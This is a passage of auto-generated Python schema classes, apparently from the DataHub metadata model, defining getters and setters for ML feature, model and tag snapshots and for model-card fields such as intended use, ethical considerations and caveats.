aspects: List[Union["MLFeatureKeyClass", "MLFeaturePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "MLFeatureSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["MLFeatureKeyClass", "MLFeaturePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the MLFeature. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["MLFeatureKeyClass", "MLFeaturePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the MLFeature. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class MLFeatureTableSnapshotClass(DictWrapper):
# No docs available.
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.MLFeatureTableSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["MLFeatureTableKeyClass", "MLFeatureTablePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "MLFeatureTableSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["MLFeatureTableKeyClass", "MLFeatureTablePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the MLFeatureTable. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["MLFeatureTableKeyClass", "MLFeatureTablePropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the MLFeatureTable. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class MLModelSnapshotClass(DictWrapper):
"""MLModel Snapshot entity details."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.MLModelSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["MLModelKeyClass", "OwnershipClass", "MLModelPropertiesClass", "IntendedUseClass", "MLModelFactorPromptsClass", "MetricsClass", "EvaluationDataClass", "TrainingDataClass", "QuantitativeAnalysesClass", "EthicalConsiderationsClass", "CaveatsAndRecommendationsClass", "InstitutionalMemoryClass", "SourceCodeClass", "StatusClass", "CostClass", "DeprecationClass", "BrowsePathsClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "MLModelSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["MLModelKeyClass", "OwnershipClass", "MLModelPropertiesClass", "IntendedUseClass", "MLModelFactorPromptsClass", "MetricsClass", "EvaluationDataClass", "TrainingDataClass", "QuantitativeAnalysesClass", "EthicalConsiderationsClass", "CaveatsAndRecommendationsClass", "InstitutionalMemoryClass", "SourceCodeClass", "StatusClass", "CostClass", "DeprecationClass", "BrowsePathsClass"]]:
"""Getter: The list of metadata aspects associated with the MLModel. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["MLModelKeyClass", "OwnershipClass", "MLModelPropertiesClass", "IntendedUseClass", "MLModelFactorPromptsClass", "MetricsClass", "EvaluationDataClass", "TrainingDataClass", "QuantitativeAnalysesClass", "EthicalConsiderationsClass", "CaveatsAndRecommendationsClass", "InstitutionalMemoryClass", "SourceCodeClass", "StatusClass", "CostClass", "DeprecationClass", "BrowsePathsClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the MLModel. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class MLPrimaryKeySnapshotClass(DictWrapper):
# No docs available.
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.MLPrimaryKeySnapshot")
def __init__(self,
urn: str,
aspects: List[Union["MLPrimaryKeyKeyClass", "MLPrimaryKeyPropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "MLPrimaryKeySnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["MLPrimaryKeyKeyClass", "MLPrimaryKeyPropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass"]]:
"""Getter: The list of metadata aspects associated with the MLPrimaryKey. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["MLPrimaryKeyKeyClass", "MLPrimaryKeyPropertiesClass", "OwnershipClass", "InstitutionalMemoryClass", "StatusClass", "DeprecationClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the MLPrimaryKey. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class TagSnapshotClass(DictWrapper):
"""A metadata snapshot for a specific dataset entity."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.snapshot.TagSnapshot")
def __init__(self,
urn: str,
aspects: List[Union["TagKeyClass", "OwnershipClass", "TagPropertiesClass", "StatusClass"]],
):
super().__init__()
self.urn = urn
self.aspects = aspects
@classmethod
def construct_with_defaults(cls) -> "TagSnapshotClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.urn = str()
self.aspects = list()
@property
def urn(self) -> str:
"""Getter: URN for the entity the metadata snapshot is associated with."""
return self._inner_dict.get('urn') # type: ignore
@urn.setter
def urn(self, value: str) -> None:
"""Setter: URN for the entity the metadata snapshot is associated with."""
self._inner_dict['urn'] = value
@property
def aspects(self) -> List[Union["TagKeyClass", "OwnershipClass", "TagPropertiesClass", "StatusClass"]]:
"""Getter: The list of metadata aspects associated with the dataset. Depending on the use case, this can either be all, or a selection, of supported aspects."""
return self._inner_dict.get('aspects') # type: ignore
@aspects.setter
def aspects(self, value: List[Union["TagKeyClass", "OwnershipClass", "TagPropertiesClass", "StatusClass"]]) -> None:
"""Setter: The list of metadata aspects associated with the dataset. Depending on the use case, this can either be all, or a selection, of supported aspects."""
self._inner_dict['aspects'] = value
class BaseDataClass(DictWrapper):
"""BaseData record"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.BaseData")
def __init__(self,
dataset: str,
motivation: Union[None, str]=None,
preProcessing: Union[None, List[str]]=None,
):
super().__init__()
self.dataset = dataset
self.motivation = motivation
self.preProcessing = preProcessing
@classmethod
def construct_with_defaults(cls) -> "BaseDataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.dataset = str()
self.motivation = self.RECORD_SCHEMA.field_map["motivation"].default
self.preProcessing = self.RECORD_SCHEMA.field_map["preProcessing"].default
@property
def dataset(self) -> str:
"""Getter: What dataset were used in the MLModel?"""
return self._inner_dict.get('dataset') # type: ignore
@dataset.setter
def dataset(self, value: str) -> None:
"""Setter: What dataset were used in the MLModel?"""
self._inner_dict['dataset'] = value
@property
def motivation(self) -> Union[None, str]:
"""Getter: Why was this dataset chosen?"""
return self._inner_dict.get('motivation') # type: ignore
@motivation.setter
def motivation(self, value: Union[None, str]) -> None:
"""Setter: Why was this dataset chosen?"""
self._inner_dict['motivation'] = value
@property
def preProcessing(self) -> Union[None, List[str]]:
"""Getter: How was the data preprocessed (e.g., tokenization of sentences, cropping of images, any filtering such as dropping images without faces)?"""
return self._inner_dict.get('preProcessing') # type: ignore
@preProcessing.setter
def preProcessing(self, value: Union[None, List[str]]) -> None:
"""Setter: How was the data preprocessed (e.g., tokenization of sentences, cropping of images, any filtering such as dropping images without faces)?"""
self._inner_dict['preProcessing'] = value
class CaveatDetailsClass(DictWrapper):
"""This section should list additional concerns that were not covered in the previous sections. For example, did the results suggest any further testing? Were there any relevant groups that were not represented in the evaluation dataset? Are there additional recommendations for model use?"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.CaveatDetails")
def __init__(self,
needsFurtherTesting: Union[None, bool]=None,
caveatDescription: Union[None, str]=None,
groupsNotRepresented: Union[None, List[str]]=None,
):
super().__init__()
self.needsFurtherTesting = needsFurtherTesting
self.caveatDescription = caveatDescription
self.groupsNotRepresented = groupsNotRepresented
@classmethod
def construct_with_defaults(cls) -> "CaveatDetailsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.needsFurtherTesting = self.RECORD_SCHEMA.field_map["needsFurtherTesting"].default
self.caveatDescription = self.RECORD_SCHEMA.field_map["caveatDescription"].default
self.groupsNotRepresented = self.RECORD_SCHEMA.field_map["groupsNotRepresented"].default
@property
def needsFurtherTesting(self) -> Union[None, bool]:
"""Getter: Did the results suggest any further testing?"""
return self._inner_dict.get('needsFurtherTesting') # type: ignore
@needsFurtherTesting.setter
def needsFurtherTesting(self, value: Union[None, bool]) -> None:
"""Setter: Did the results suggest any further testing?"""
self._inner_dict['needsFurtherTesting'] = value
@property
def caveatDescription(self) -> Union[None, str]:
"""Getter: Caveat Description
For ex: Given gender classes are binary (male/not male), which we include as male/female. Further work needed to evaluate across a spectrum of genders."""
return self._inner_dict.get('caveatDescription') # type: ignore
@caveatDescription.setter
def caveatDescription(self, value: Union[None, str]) -> None:
"""Setter: Caveat Description
For ex: Given gender classes are binary (male/not male), which we include as male/female. Further work needed to evaluate across a spectrum of genders."""
self._inner_dict['caveatDescription'] = value
@property
def groupsNotRepresented(self) -> Union[None, List[str]]:
"""Getter: Relevant groups that were not represented in the evaluation dataset?"""
return self._inner_dict.get('groupsNotRepresented') # type: ignore
@groupsNotRepresented.setter
def groupsNotRepresented(self, value: Union[None, List[str]]) -> None:
"""Setter: Relevant groups that were not represented in the evaluation dataset?"""
self._inner_dict['groupsNotRepresented'] = value
class CaveatsAndRecommendationsClass(DictWrapper):
"""This section should list additional concerns that were not covered in the previous sections. For example, did the results suggest any further testing? Were there any relevant groups that were not represented in the evaluation dataset? Are there additional recommendations for model use?"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.CaveatsAndRecommendations")
def __init__(self,
caveats: Union[None, "CaveatDetailsClass"]=None,
recommendations: Union[None, str]=None,
idealDatasetCharacteristics: Union[None, List[str]]=None,
):
super().__init__()
self.caveats = caveats
self.recommendations = recommendations
self.idealDatasetCharacteristics = idealDatasetCharacteristics
@classmethod
def construct_with_defaults(cls) -> "CaveatsAndRecommendationsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.caveats = self.RECORD_SCHEMA.field_map["caveats"].default
self.recommendations = self.RECORD_SCHEMA.field_map["recommendations"].default
self.idealDatasetCharacteristics = self.RECORD_SCHEMA.field_map["idealDatasetCharacteristics"].default
@property
def caveats(self) -> Union[None, "CaveatDetailsClass"]:
"""Getter: This section should list additional concerns that were not covered in the previous sections. For example, did the results suggest any further testing? Were there any relevant groups that were not represented in the evaluation dataset?"""
return self._inner_dict.get('caveats') # type: ignore
@caveats.setter
def caveats(self, value: Union[None, "CaveatDetailsClass"]) -> None:
"""Setter: This section should list additional concerns that were not covered in the previous sections. For example, did the results suggest any further testing? Were there any relevant groups that were not represented in the evaluation dataset?"""
self._inner_dict['caveats'] = value
@property
def recommendations(self) -> Union[None, str]:
"""Getter: Recommendations on where this MLModel should be used."""
return self._inner_dict.get('recommendations') # type: ignore
@recommendations.setter
def recommendations(self, value: Union[None, str]) -> None:
"""Setter: Recommendations on where this MLModel should be used."""
self._inner_dict['recommendations'] = value
@property
def idealDatasetCharacteristics(self) -> Union[None, List[str]]:
"""Getter: Ideal characteristics of an evaluation dataset for this MLModel"""
return self._inner_dict.get('idealDatasetCharacteristics') # type: ignore
@idealDatasetCharacteristics.setter
def idealDatasetCharacteristics(self, value: Union[None, List[str]]) -> None:
"""Setter: Ideal characteristics of an evaluation dataset for this MLModel"""
self._inner_dict['idealDatasetCharacteristics'] = value
class EthicalConsiderationsClass(DictWrapper):
"""This section is intended to demonstrate the ethical considerations that went into MLModel development, surfacing ethical challenges and solutions to stakeholders."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.EthicalConsiderations")
def __init__(self,
data: Union[None, List[str]]=None,
humanLife: Union[None, List[str]]=None,
mitigations: Union[None, List[str]]=None,
risksAndHarms: Union[None, List[str]]=None,
useCases: Union[None, List[str]]=None,
):
super().__init__()
self.data = data
self.humanLife = humanLife
self.mitigations = mitigations
self.risksAndHarms = risksAndHarms
self.useCases = useCases
@classmethod
def construct_with_defaults(cls) -> "EthicalConsiderationsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.data = self.RECORD_SCHEMA.field_map["data"].default
self.humanLife = self.RECORD_SCHEMA.field_map["humanLife"].default
self.mitigations = self.RECORD_SCHEMA.field_map["mitigations"].default
self.risksAndHarms = self.RECORD_SCHEMA.field_map["risksAndHarms"].default
self.useCases = self.RECORD_SCHEMA.field_map["useCases"].default
@property
def data(self) -> Union[None, List[str]]:
"""Getter: Does the MLModel use any sensitive data (e.g., protected classes)?"""
return self._inner_dict.get('data') # type: ignore
@data.setter
def data(self, value: Union[None, List[str]]) -> None:
"""Setter: Does the MLModel use any sensitive data (e.g., protected classes)?"""
self._inner_dict['data'] = value
@property
def humanLife(self) -> Union[None, List[str]]:
"""Getter: Is the MLModel intended to inform decisions about matters central to human life or flourishing – e.g., health or safety? Or could it be used in such a way?"""
return self._inner_dict.get('humanLife') # type: ignore
@humanLife.setter
def humanLife(self, value: Union[None, List[str]]) -> None:
"""Setter: Is the MLModel intended to inform decisions about matters central to human life or flourishing – e.g., health or safety? Or could it be used in such a way?"""
self._inner_dict['humanLife'] = value
@property
def mitigations(self) -> Union[None, List[str]]:
"""Getter: What risk mitigation strategies were used during MLModel development?"""
return self._inner_dict.get('mitigations') # type: ignore
@mitigations.setter
def mitigations(self, value: Union[None, List[str]]) -> None:
"""Setter: What risk mitigation strategies were used during MLModel development?"""
self._inner_dict['mitigations'] = value
@property
def risksAndHarms(self) -> Union[None, List[str]]:
"""Getter: What risks may be present in MLModel usage? Try to identify the potential recipients, likelihood, and magnitude of harms. If these cannot be determined, note that they were considered but remain unknown."""
return self._inner_dict.get('risksAndHarms') # type: ignore
@risksAndHarms.setter
def risksAndHarms(self, value: Union[None, List[str]]) -> None:
"""Setter: What risks may be present in MLModel usage? Try to identify the potential recipients, likelihood, and magnitude of harms. If these cannot be determined, note that they were considered but remain unknown."""
self._inner_dict['risksAndHarms'] = value
@property
def useCases(self) -> Union[None, List[str]]:
"""Getter: Are there any known MLModel use cases that are especially fraught? This may connect directly to the intended use section"""
return self._inner_dict.get('useCases') # type: ignore
@useCases.setter
def useCases(self, value: Union[None, List[str]]) -> None:
"""Setter: Are there any known MLModel use cases that are especially fraught? This may connect directly to the intended use section"""
self._inner_dict['useCases'] = value
class EvaluationDataClass(DictWrapper):
"""All referenced datasets would ideally point to any set of documents that provide visibility into the source and composition of the dataset."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.EvaluationData")
def __init__(self,
evaluationData: List["BaseDataClass"],
):
super().__init__()
self.evaluationData = evaluationData
@classmethod
def construct_with_defaults(cls) -> "EvaluationDataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.evaluationData = list()
@property
def evaluationData(self) -> List["BaseDataClass"]:
"""Getter: Details on the dataset(s) used for the quantitative analyses in the MLModel"""
return self._inner_dict.get('evaluationData') # type: ignore
@evaluationData.setter
def evaluationData(self, value: List["BaseDataClass"]) -> None:
"""Setter: Details on the dataset(s) used for the quantitative analyses in the MLModel"""
self._inner_dict['evaluationData'] = value
class IntendedUseClass(DictWrapper):
"""Intended Use for the ML Model"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.IntendedUse")
def __init__(self,
primaryUses: Union[None, List[str]]=None,
primaryUsers: Union[None, List[Union[str, "IntendedUserTypeClass"]]]=None,
outOfScopeUses: Union[None, List[str]]=None,
):
super().__init__()
self.primaryUses = primaryUses
self.primaryUsers = primaryUsers
self.outOfScopeUses = outOfScopeUses
@classmethod
def construct_with_defaults(cls) -> "IntendedUseClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.primaryUses = self.RECORD_SCHEMA.field_map["primaryUses"].default
self.primaryUsers = self.RECORD_SCHEMA.field_map["primaryUsers"].default
self.outOfScopeUses = self.RECORD_SCHEMA.field_map["outOfScopeUses"].default
@property
def primaryUses(self) -> Union[None, List[str]]:
"""Getter: Primary Use cases for the MLModel."""
return self._inner_dict.get('primaryUses') # type: ignore
@primaryUses.setter
def primaryUses(self, value: Union[None, List[str]]) -> None:
"""Setter: Primary Use cases for the MLModel."""
self._inner_dict['primaryUses'] = value
@property
def primaryUsers(self) -> Union[None, List[Union[str, "IntendedUserTypeClass"]]]:
"""Getter: Primary Intended Users - For example, was the MLModel developed for entertainment purposes, for hobbyists, or enterprise solutions?"""
return self._inner_dict.get('primaryUsers') # type: ignore
@primaryUsers.setter
def primaryUsers(self, value: Union[None, List[Union[str, "IntendedUserTypeClass"]]]) -> None:
"""Setter: Primary Intended Users - For example, was the MLModel developed for entertainment purposes, for hobbyists, or enterprise solutions?"""
self._inner_dict['primaryUsers'] = value
@property
def outOfScopeUses(self) -> Union[None, List[str]]:
"""Getter: Highlight technology that the MLModel might easily be confused with, or related contexts that users could try to apply the MLModel to."""
return self._inner_dict.get('outOfScopeUses') # type: ignore
@outOfScopeUses.setter
def outOfScopeUses(self, value: Union[None, List[str]]) -> None:
"""Setter: Highlight technology that the MLModel might easily be confused with, or related contexts that users could try to apply the MLModel to."""
self._inner_dict['outOfScopeUses'] = value
class IntendedUserTypeClass(object):
# No docs available.
ENTERPRISE = "ENTERPRISE"
HOBBY = "HOBBY"
ENTERTAINMENT = "ENTERTAINMENT"
class MLFeaturePropertiesClass(DictWrapper):
"""Properties associated with a MLFeature"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLFeatureProperties")
def __init__(self,
description: Union[None, str]=None,
dataType: Union[None, Union[str, "MLFeatureDataTypeClass"]]=None,
version: Union[None, "VersionTagClass"]=None,
sources: Union[None, List[str]]=None,
):
super().__init__()
self.description = description
self.dataType = dataType
self.version = version
self.sources = sources
@classmethod
def construct_with_defaults(cls) -> "MLFeaturePropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.dataType = self.RECORD_SCHEMA.field_map["dataType"].default
self.version = self.RECORD_SCHEMA.field_map["version"].default
self.sources = self.RECORD_SCHEMA.field_map["sources"].default
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the MLFeature"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the MLFeature"""
self._inner_dict['description'] = value
@property
def dataType(self) -> Union[None, Union[str, "MLFeatureDataTypeClass"]]:
"""Getter: Data Type of the MLFeature"""
return self._inner_dict.get('dataType') # type: ignore
@dataType.setter
def dataType(self, value: Union[None, Union[str, "MLFeatureDataTypeClass"]]) -> None:
"""Setter: Data Type of the MLFeature"""
self._inner_dict['dataType'] = value
@property
def version(self) -> Union[None, "VersionTagClass"]:
"""Getter: Version of the MLFeature"""
return self._inner_dict.get('version') # type: ignore
@version.setter
def version(self, value: Union[None, "VersionTagClass"]) -> None:
"""Setter: Version of the MLFeature"""
self._inner_dict['version'] = value
@property
def sources(self) -> Union[None, List[str]]:
"""Getter: Source of the MLFeature"""
return self._inner_dict.get('sources') # type: ignore
@sources.setter
def sources(self, value: Union[None, List[str]]) -> None:
"""Setter: Source of the MLFeature"""
self._inner_dict['sources'] = value
class MLFeatureTablePropertiesClass(DictWrapper):
"""Properties associated with a MLFeatureTable"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLFeatureTableProperties")
def __init__(self,
customProperties: Optional[Dict[str, str]]=None,
description: Union[None, str]=None,
mlFeatures: Union[None, List[str]]=None,
mlPrimaryKeys: Union[None, List[str]]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.description = description
self.mlFeatures = mlFeatures
self.mlPrimaryKeys = mlPrimaryKeys
@classmethod
def construct_with_defaults(cls) -> "MLFeatureTablePropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.mlFeatures = self.RECORD_SCHEMA.field_map["mlFeatures"].default
self.mlPrimaryKeys = self.RECORD_SCHEMA.field_map["mlPrimaryKeys"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the MLFeatureTable"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the MLFeatureTable"""
self._inner_dict['description'] = value
@property
def mlFeatures(self) -> Union[None, List[str]]:
"""Getter: List of features contained in the feature table"""
return self._inner_dict.get('mlFeatures') # type: ignore
@mlFeatures.setter
def mlFeatures(self, value: Union[None, List[str]]) -> None:
"""Setter: List of features contained in the feature table"""
self._inner_dict['mlFeatures'] = value
@property
def mlPrimaryKeys(self) -> Union[None, List[str]]:
"""Getter: List of primary keys in the feature table (if multiple, assumed to act as a composite key)"""
return self._inner_dict.get('mlPrimaryKeys') # type: ignore
@mlPrimaryKeys.setter
def mlPrimaryKeys(self, value: Union[None, List[str]]) -> None:
"""Setter: List of primary keys in the feature table (if multiple, assumed to act as a composite key)"""
self._inner_dict['mlPrimaryKeys'] = value
class MLModelFactorPromptsClass(DictWrapper):
"""Prompts which affect the performance of the MLModel"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLModelFactorPrompts")
def __init__(self,
relevantFactors: Union[None, List["MLModelFactorsClass"]]=None,
evaluationFactors: Union[None, List["MLModelFactorsClass"]]=None,
):
super().__init__()
self.relevantFactors = relevantFactors
self.evaluationFactors = evaluationFactors
@classmethod
def construct_with_defaults(cls) -> "MLModelFactorPromptsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.relevantFactors = self.RECORD_SCHEMA.field_map["relevantFactors"].default
self.evaluationFactors = self.RECORD_SCHEMA.field_map["evaluationFactors"].default
@property
def relevantFactors(self) -> Union[None, List["MLModelFactorsClass"]]:
"""Getter: What are foreseeable salient factors for which MLModel performance may vary, and how were these determined?"""
return self._inner_dict.get('relevantFactors') # type: ignore
@relevantFactors.setter
def relevantFactors(self, value: Union[None, List["MLModelFactorsClass"]]) -> None:
"""Setter: What are foreseeable salient factors for which MLModel performance may vary, and how were these determined?"""
self._inner_dict['relevantFactors'] = value
@property
def evaluationFactors(self) -> Union[None, List["MLModelFactorsClass"]]:
"""Getter: Which factors are being reported, and why were these chosen?"""
return self._inner_dict.get('evaluationFactors') # type: ignore
@evaluationFactors.setter
def evaluationFactors(self, value: Union[None, List["MLModelFactorsClass"]]) -> None:
"""Setter: Which factors are being reported, and why were these chosen?"""
self._inner_dict['evaluationFactors'] = value
class MLModelFactorsClass(DictWrapper):
"""Factors affecting the performance of the MLModel."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLModelFactors")
def __init__(self,
groups: Union[None, List[str]]=None,
instrumentation: Union[None, List[str]]=None,
environment: Union[None, List[str]]=None,
):
super().__init__()
self.groups = groups
self.instrumentation = instrumentation
self.environment = environment
@classmethod
def construct_with_defaults(cls) -> "MLModelFactorsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.groups = self.RECORD_SCHEMA.field_map["groups"].default
self.instrumentation = self.RECORD_SCHEMA.field_map["instrumentation"].default
self.environment = self.RECORD_SCHEMA.field_map["environment"].default
@property
def groups(self) -> Union[None, List[str]]:
"""Getter: Groups refers to distinct categories with similar characteristics that are present in the evaluation data instances.
For human-centric machine learning MLModels, groups are people who share one or multiple characteristics."""
return self._inner_dict.get('groups') # type: ignore
@groups.setter
def groups(self, value: Union[None, List[str]]) -> None:
"""Setter: Groups refers to distinct categories with similar characteristics that are present in the evaluation data instances.
For human-centric machine learning MLModels, groups are people who share one or multiple characteristics."""
self._inner_dict['groups'] = value
@property
def instrumentation(self) -> Union[None, List[str]]:
"""Getter: The performance of a MLModel can vary depending on what instruments were used to capture the input to the MLModel.
For example, a face detection model may perform differently depending on the camera’s hardware and software,
including lens, image stabilization, high dynamic range techniques, and background blurring for portrait mode."""
return self._inner_dict.get('instrumentation') # type: ignore
@instrumentation.setter
def instrumentation(self, value: Union[None, List[str]]) -> None:
"""Setter: The performance of a MLModel can vary depending on what instruments were used to capture the input to the MLModel.
For example, a face detection model may perform differently depending on the camera’s hardware and software,
including lens, image stabilization, high dynamic range techniques, and background blurring for portrait mode."""
self._inner_dict['instrumentation'] = value
@property
def environment(self) -> Union[None, List[str]]:
"""Getter: A further factor affecting MLModel performance is the environment in which it is deployed."""
return self._inner_dict.get('environment') # type: ignore
@environment.setter
def environment(self, value: Union[None, List[str]]) -> None:
"""Setter: A further factor affecting MLModel performance is the environment in which it is deployed."""
self._inner_dict['environment'] = value
class MLModelPropertiesClass(DictWrapper):
"""Properties associated with a ML Model"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.MLModelProperties")
def __init__(self,
customProperties: Optional[Dict[str, str]]=None,
description: Union[None, str]=None,
date: Union[None, int]=None,
version: Union[None, "VersionTagClass"]=None,
type: Union[None, str]=None,
hyperParameters: Union[None, Dict[str, Union[str, int, float, float, bool]]]=None,
mlFeatures: Union[None, List[str]]=None,
tags: Optional[List[str]]=None,
trainingJobs: Union[None, List[str]]=None,
downstreamJobs: Union[None, List[str]]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.description = description
self.date = date
self.version = version
self.type = type
self.hyperParameters = hyperParameters
self.mlFeatures = mlFeatures
if tags is None:
# default: []
self.tags = list()
else:
self.tags = tags
self.trainingJobs = trainingJobs
self.downstreamJobs = downstreamJobs
@classmethod
def construct_with_defaults(cls) -> "MLModelPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.date = self.RECORD_SCHEMA.field_map["date"].default
self.version = self.RECORD_SCHEMA.field_map["version"].default
self.type = self.RECORD_SCHEMA.field_map["type"].default
self.hyperParameters = self.RECORD_SCHEMA.field_map["hyperParameters"].default
self.mlFeatures = self.RECORD_SCHEMA.field_map["mlFeatures"].default
self.tags = list()
self.trainingJobs = self.RECORD_SCHEMA.field_map["trainingJobs"].default
self.downstreamJobs = self.RECORD_SCHEMA.field_map["downstreamJobs"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the MLModel"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the MLModel"""
self._inner_dict['description'] = value
@property
def date(self) -> Union[None, int]:
"""Getter: Date when the MLModel was developed"""
return self._inner_dict.get('date') # type: ignore
@date.setter
def date(self, value: Union[None, int]) -> None:
